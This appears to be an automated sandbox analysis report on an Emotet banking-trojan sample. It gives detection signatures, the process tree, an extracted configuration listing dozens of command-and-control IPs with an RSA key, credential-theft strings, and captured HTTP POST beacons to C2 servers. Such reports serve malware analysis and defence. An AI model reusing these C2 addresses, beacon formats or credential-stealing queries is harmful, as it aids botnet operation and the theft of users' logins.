Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.DownLoader34.9370.19760.13969

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoader34.9370.19760.13969 (renamed file extension from 13969 to exe)
Analysis ID:255759
MD5:a2c038cc8205f00dca64aa3d20bb9ecd
SHA1:957478059eb00dd57b0b3030609aab143148decd
SHA256:f72b1feeab655ed062315560ef318ff48e4a980ba00e4a58a56a289a29c84858

Most interesting Screenshot:

Detection

Emotet MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe (PID: 6888 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
    • WinRtTracing.exe (PID: 6928 cmdline: C:\Windows\SysWOW64\webservices\WinRtTracing.exe MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracing.exe (PID: 6016 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracing.exe (PID: 4516 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracing.exe (PID: 4584 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp' MD5: A2C038CC8205F00DCA64AA3D20BB9ECD)
      • WinRtTracingoe.exe (PID: 4300 cmdline: 'C:\Windows\SysWOW64\webservices\WinRtTracingoe.exe' 'C:\Users\user\AppData\Local\Temp\1A19.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 6132 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6648 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5456 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6088 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2020 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["179.60.229.168:443", "185.94.252.13:443", "189.218.165.63:80", "77.90.136.129:8080", "217.199.160.224:7080", "104.131.41.185:8080", "2.47.112.152:80", "185.94.252.27:443", "186.250.52.226:8080", "51.255.165.160:8080", "68.183.170.114:8080", "191.99.160.58:80", "104.131.103.37:8080", "181.31.211.181:80", "202.62.39.111:80", "83.169.21.32:7080", "87.106.46.107:8080", "72.47.248.48:7080", "177.75.143.112:443", "190.17.195.202:80", "137.74.106.111:7080", "181.129.96.162:8080", "82.196.15.205:8080", "61.92.159.208:8080", "190.6.193.152:8080", "181.167.96.215:80", "143.0.87.101:80", "12.162.84.2:8080", "212.71.237.140:8080", "217.13.106.14:8080", "46.214.11.172:80", "114.109.179.60:80", "89.32.150.160:8080", "185.94.252.12:80", "177.72.13.80:80", "192.241.146.84:8080", "189.1.185.98:8080", "187.106.41.99:80", "219.92.13.25:80", "181.30.69.50:80", "68.183.190.199:8080", "212.231.60.98:80", "190.181.235.46:80", "157.7.199.53:8080", "178.79.163.131:8080", "77.55.211.77:8080", "204.225.249.100:7080", "170.81.48.2:80", "104.236.161.64:8080", "5.196.35.138:7080", "190.194.242.254:443", "50.28.51.143:8080", "187.162.248.237:80", "46.28.111.142:7080", "70.32.84.74:8080", "203.25.159.3:8080", "190.163.31.26:80", "177.144.135.2:80", "177.73.0.98:443", "177.139.131.143:443", "177.74.228.34:80", "191.182.6.118:80", "94.176.234.118:443", "45.161.242.102:80", "149.62.173.247:8080", "144.139.91.187:443", "181.120.79.227:80", "80.249.176.206:80", "71.50.31.38:80", "172.104.169.32:8080", "192.241.143.52:8080", "111.67.12.221:8080", "190.147.137.153:443", "177.66.190.130:80", "70.32.115.157:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1279031602.0000000000580000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.1543674898.0000000000671000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000002.1547549347.0000000003400000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.1547978728.0000000003660000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            Click to see the 20 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.WinRtTracing.exe.35b0000.4.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              1.2.WinRtTracing.exe.3660000.5.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                1.3.WinRtTracing.exe.3d20000.4.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
                  1.3.WinRtTracing.exe.3580000.5.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
                  • 0x147b0:$a1: logins.json
                  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
                  • 0x14f34:$s4: \mozsqlite3.dll
                  • 0x137a4:$s5: SMTP Password
                  1.3.WinRtTracing.exe.3580000.5.raw.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
                    Click to see the 13 entries

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Suspicious Process CreationShow sources
                    Source: Process startedAuthor: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp', CommandLine: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, NewProcessName: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, OriginalFileName: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, ParentCommandLine: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, ParentImage: C:\Windows\SysWOW64\webservices\WinRtTracing.exe, ParentProcessId: 6928, ProcessCommandLine: 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp', ProcessId: 4516

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 00000000.00000002.1279031602.0000000000580000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["179.60.229.168:443", "185.94.252.13:443", "189.218.165.63:80", "77.90.136.129:8080", "217.199.160.224:7080", "104.131.41.185:8080", "2.47.112.152:80", "185.94.252.27:443", "186.250.52.226:8080", "51.255.165.160:8080", "68.183.170.114:8080", "191.99.160.58:80", "104.131.103.37:8080", "181.31.211.181:80", "202.62.39.111:80", "83.169.21.32:7080", "87.106.46.107:8080", "72.47.248.48:7080", "177.75.143.112:443", "190.17.195.202:80", "137.74.106.111:7080", "181.129.96.162:8080", "82.196.15.205:8080", "61.92.159.208:8080", "190.6.193.152:8080", "181.167.96.215:80", "143.0.87.101:80", "12.162.84.2:8080", "212.71.237.140:8080", "217.13.106.14:8080", "46.214.11.172:80", "114.109.179.60:80", "89.32.150.160:8080", "185.94.252.12:80", "177.72.13.80:80", "192.241.146.84:8080", "189.1.185.98:8080", "187.106.41.99:80", "219.92.13.25:80", "181.30.69.50:80", "68.183.190.199:8080", "212.231.60.98:80", "190.181.235.46:80", "157.7.199.53:8080", "178.79.163.131:8080", "77.55.211.77:8080", "204.225.249.100:7080", "170.81.48.2:80", "104.236.161.64:8080", "5.196.35.138:7080", "190.194.242.254:443", "50.28.51.143:8080", "187.162.248.237:80", "46.28.111.142:7080", "70.32.84.74:8080", "203.25.159.3:8080", "190.163.31.26:80", "177.144.135.2:80", "177.73.0.98:443", "177.139.131.143:443", "177.74.228.34:80", "191.182.6.118:80", "94.176.234.118:443", "45.161.242.102:80", "149.62.173.247:8080", "144.139.91.187:443", "181.120.79.227:80", "80.249.176.206:80", "71.50.31.38:80", "172.104.169.32:8080", "192.241.143.52:8080", "111.67.12.221:8080", "190.147.137.153:443", "177.66.190.130:80", "70.32.115.157:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0044438D __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_0044438D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004448A3 FindFirstFileA,FindClose,0_2_004448A3
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_0040A1A7 FindFirstFileW,FindNextFileW,5_2_0040A1A7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_0040A1A7 FindFirstFileW,FindNextFileW,5_1_0040A1A7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,6_2_0040702D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_0040702D FindFirstFileA,FindNextFileA,6_1_0040702D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9476B14 FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_00007FF6E9476B14
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9472154 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00007FF6E9472154
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94841DC FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6E94841DC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9476088 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,7_2_00007FF6E9476088
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94614F0 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00007FF6E94614F0

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.5:49740 -> 179.60.229.168:443
                    Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.5:49743 -> 185.94.252.13:443
                    Source: global trafficHTTP traffic detected: POST /0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/ HTTP/1.1Referer: http://185.94.252.13/0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/Content-Type: multipart/form-data; boundary=---------------------------071551534042271User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /NczmKeYDGfHp/5l4guzk95jLWV0b/LbnZGPSlgdLJQpmZ4Ru/XI7nSSxFAd/6KL23UUS781fHpq/ HTTP/1.1Referer: http://185.94.252.13/NczmKeYDGfHp/5l4guzk95jLWV0b/LbnZGPSlgdLJQpmZ4Ru/XI7nSSxFAd/6KL23UUS781fHpq/Content-Type: multipart/form-data; boundary=---------------------------792132913284084User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /LkQRkz/R3f1zycgLzHWjXhLWT/rC0s4XESEawZUtL5uL/ HTTP/1.1Referer: http://185.94.252.13/LkQRkz/R3f1zycgLzHWjXhLWT/rC0s4XESEawZUtL5uL/Content-Type: multipart/form-data; boundary=---------------------------708151790454032User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /luuMxtU8/ HTTP/1.1Referer: http://185.94.252.13/luuMxtU8/Content-Type: multipart/form-data; boundary=---------------------------920119865678551User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/ HTTP/1.1Referer: http://185.94.252.13/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/Content-Type: multipart/form-data; boundary=---------------------------728227786047311User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /6tltkgW1nrL6LLQh/343N4F6afmz1RZs9D/kHuvewuN4uY/IVcygh5gG/ghYHblPr/ HTTP/1.1Referer: http://185.94.252.13/6tltkgW1nrL6LLQh/343N4F6afmz1RZs9D/kHuvewuN4uY/IVcygh5gG/ghYHblPr/Content-Type: multipart/form-data; boundary=---------------------------122433531428026User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4628Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/ HTTP/1.1Referer: http://88.217.172.65/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/Content-Type: multipart/form-data; boundary=---------------------------572715936792328User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 179.60.229.168
                    Source: unknownTCP traffic detected without corresponding DNS query: 179.60.229.168
                    Source: unknownTCP traffic detected without corresponding DNS query: 179.60.229.168
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
                    Source: WinRtTracing.exe, 00000005.00000003.1327753679.0000000000A09000.00000004.00000001.sdmpString found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.facebook.com (Facebook)
                    Source: WinRtTracing.exe, 00000005.00000003.1327753679.0000000000A09000.00000004.00000001.sdmpString found in binary or memory: :///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login+\P equals www.yahoo.com (Yahoo)
                    Source: WinRtTracing.exe, 00000001.00000003.1328991766.00000000037F1000.00000004.00000001.sdmp, WinRtTracing.exe, 00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: WinRtTracing.exe, 00000001.00000003.1328991766.00000000037F1000.00000004.00000001.sdmp, WinRtTracing.exe, 00000005.00000001.1324276138.0000000000400000.00000040.00020000.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: WinRtTracing.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: unknownHTTP traffic detected: POST /0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/ HTTP/1.1Referer: http://185.94.252.13/0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpRJSXYe/Content-Type: multipart/form-data; boundary=---------------------------071551534042271User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: WinRtTracing.exe, 00000001.00000003.1316290803.0000000002694000.00000004.00000001.sdmpString found in binary or memory: http://179.60.229.168/QMTxx/fRj4LOH/d1I0lWeH4yIv/CW7zkyIMpHmzAU/
                    Source: WinRtTracing.exe, 00000001.00000003.1317407858.0000000002696000.00000004.00000001.sdmpString found in binary or memory: http://179.60.229.168:443/QMTxx/fRj4LOH/d1I0lWeH4yIv/CW7zkyIMpHmzAU/
                    Source: WinRtTracing.exe, 00000001.00000003.1317407858.0000000002696000.00000004.00000001.sdmpString found in binary or memory: http://179.60.229.168:443/QMTxx/fRj4LOH/d1I0lWeH4yIv/CW7zkyIMpHmzAU/4
                    Source: WinRtTracing.exe, 00000001.00000003.1320598627.00000000026B8000.00000004.00000001.sdmp, WinRtTracing.exe, 00000001.00000003.1320726632.00000000024E2000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/luuMxtU8/
                    Source: WinRtTracing.exe, 00000001.00000002.1543844951.000000000086A000.00000004.00000020.sdmpString found in binary or memory: http://185.94.252.13:443/0yES7CKlJz/DDdOAZzBcfiv2/vRMWBAVW4TyOmBR22s/ycpr1LTeWAmokNrn/B3goLKzU87sJpR
                    Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/LkQRkz/R3f1zycgLzHWjXhLWT/rC0s4XESEawZUtL5uL/
                    Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/NczmKeYDGfHp/5l4guzk95jLWV0b/LbnZGPSlgdLJQpmZ4Ru/XI7nSSxFAd/6KL23UUS781fHpq
                    Source: WinRtTracing.exe, 00000001.00000003.1329090354.00000000024EC000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/
                    Source: WinRtTracing.exe, 00000001.00000003.1323670599.00000000024ED000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/9/
                    Source: WinRtTracing.exe, 00000001.00000003.1329090354.00000000024EC000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/_(
                    Source: WinRtTracing.exe, 00000001.00000003.1323670599.00000000024ED000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/fClpccIzUx799zh1d/Hp3yUNDcP2/scl9uSVnWTV/bcaai6WCa2/t(
                    Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/luuMxtU8/
                    Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/
                    Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/F
                    Source: WinRtTracing.exe, 00000001.00000002.1544575499.0000000002682000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/gEyes1mWw4/7d5lH64/gVGvGf/8cRA/N2GFoA7ZSzKdE/H
                    Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                    Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: WinRtTracing.exe, 00000005.00000002.1327970586.000000000019C000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
